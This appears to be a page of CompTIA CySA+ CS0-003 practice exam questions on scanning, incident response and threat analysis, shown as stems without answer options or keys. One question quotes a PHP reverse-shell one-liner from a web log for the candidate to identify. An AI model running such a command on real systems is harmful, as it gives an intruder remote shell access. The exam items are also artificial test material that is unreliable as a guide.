COMPTIA-CYSA

CompTIA's CS0-003 Several vulnerability scan reports have indicated runtime errors as the code is executing. The dashboard that lists the errors has a command-line interface for developers to check for vulnerabilities. Which of the following will enable a developer to correct this issue? (Choose two.) E. Implementing a coding standard F. Implementing IDS

CompTIA's CS0-003 A security analyst is trying to validate the results of a web application scan with Burp Suite. The security analyst performs the following:Which of the following vulnerabilities is the security analyst trying to validate?

CompTIA's CS0-003 A cybersecurity team has witnessed numerous vulnerability events recently that have affected operating systems. The team decides to implement host-based IPS, firewalls and two-factor authentication. Which of the following does this most likely describe?

CompTIA's CS0-003 A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. Which of the following should be implemented?

CompTIA's CS0-003 An analyst investigated a website and produced the following:Which of the following syntaxes did the analyst use to discover the application versions on this vulnerable website?

CompTIA's CS0-003 A cybersecurity analyst is doing triage in a SIEM and notices that the time stamps between the firewall and the host under investigation are off by 43 minutes. Which of the following is the most likely scenario occurring with the time stamps?

CompTIA's CS0-003 A payroll department employee was the target of a phishing attack in which an attacker impersonated a department director and requested that direct deposit information be updated to a new account. Afterward, a deposit was made into the unauthorized account. Which of the following is one of the first actions the incident response team should take when they receive notification of the attack?

CompTIA's CS0-003 A security analyst has found the following suspicious DNS traffic while analyzing a packet capture:• DNS traffic while a tunneling session is active.• The mean time between queries is less than one second.• The average query length exceeds 100 characters.Which of the following attacks most likely occurred?

CompTIA's CS0-003 A small company does not have enough staff to effectively segregate duties to prevent error and fraud in payroll management. The Chief Information Security Officer (CISO) decides to maintain and review logs and audit trails to mitigate risk. Which of the following did the CISO implement?

CompTIA's CS0-003 During the log analysis phase, the following suspicious command is detected:Which of the following is being attempted?

CompTIA's CS0-003 An email hosting provider added a new data center with new public IP addresses. Which of the following most likely needs to be updated to ensure emails from the new data center do not get blocked by spam filters?

CompTIA's CS0-003 A laptop that is company owned and managed is suspected to have malware. The company implemented centralized security logging. Which of the following log sources will confirm the malware infection?

CompTIA's CS0-003 Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?

CompTIA's CS0-003 A security analyst has prepared a vulnerability scan that contains all of the company’s functional subnets. During the initial scan users reported that network printers began to print pages that contained unreadable text and icons. Which of the following should the analyst do to ensure this behavior does not occur during subsequent vulnerability scans?

CompTIA's CS0-003 A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project:• Must use minimal network bandwidth• Must use minimal host resources• Must provide accurate, near real-time updates• Must not have any stored credentials in configuration on the scannerWhich of the following vulnerability scanning methods should be used to best meet these requirements?

CompTIA's CS0-003 An employee is no longer able to log in to an account after updating a browser. The employee usually has several tabs open in the browser. Which of the following attacks was most likely performed?

CompTIA's CS0-003 Which of the following does "federation" most likely refer to within the context of identity and access management?

CompTIA's CS0-003 The Chief Information Security Officer for an organization recently received approval to install a new EDR solution. Following the installation, the number of alerts that require remediation by an analyst has tripled. Which of the following should the organization utilize to best centralize the workload for the internal security team? (Choose two.) E. XDR F. DLP

CompTIA's CS0-003 Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?

CompTIA's CS0-003 A security analyst has received an incident case regarding malware spreading out of control on a customer's network. The analyst is unsure how to respond. The configured EDR has automatically obtained a sample of the malware and its signature. Which of the following should the analyst perform next to determine the type of malware based on its telemetry?

CompTIA's CS0-003 A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the most likely cause?

CompTIA's CS0-003 Which of the following is a useful tool for mapping, tracking, and mitigating identified threats and vulnerabilities with the likelihood and impact of occurrence?

CompTIA's CS0-003 Which of the following is often used to keep the number of alerts to a manageable level when establishing a process to track and analyze violations?

CompTIA's CS0-003 While reviewing web server logs, a security analyst discovers the following suspicious line:php -r ’$socket=fsockopen("10.0.0.1", 1234); passthru ("/bin/sh -i <&3 >&3 2>&3");’Which of the following is being attempted?

CompTIA's CS0-003 Which of the following should be updated after a lessons-learned review?

CompTIA's CS0-003 A software developer has been deploying web applications with common security risks to include insufficient logging capabilities. Which of the following actions would be most effective to reduce risks associated with the application development?

CompTIA's CS0-003 An analyst suspects cleartext passwords are being sent over the network. Which of the following tools would best support the analyst's investigation?

CompTIA's CS0-003 Using open-source intelligence gathered from technical forums, a threat actor compiles and tests a malicious downloader to ensure it will not be detected by the victim organization's endpoint security protections. Which of the following stages of the Cyber Kill Chain best aligns with the threat actor's actions?

CompTIA's CS0-003 An organization would like to ensure its cloud infrastructure has a hardened configuration. A requirement is to create a server image that can be deployed with a secure template. Which of the following is the best resource to ensure secure configuration?

CompTIA's CS0-003 A security analyst reviews the following Arachni scan results for a web application that stores PII data:Which of the following should be remediated first?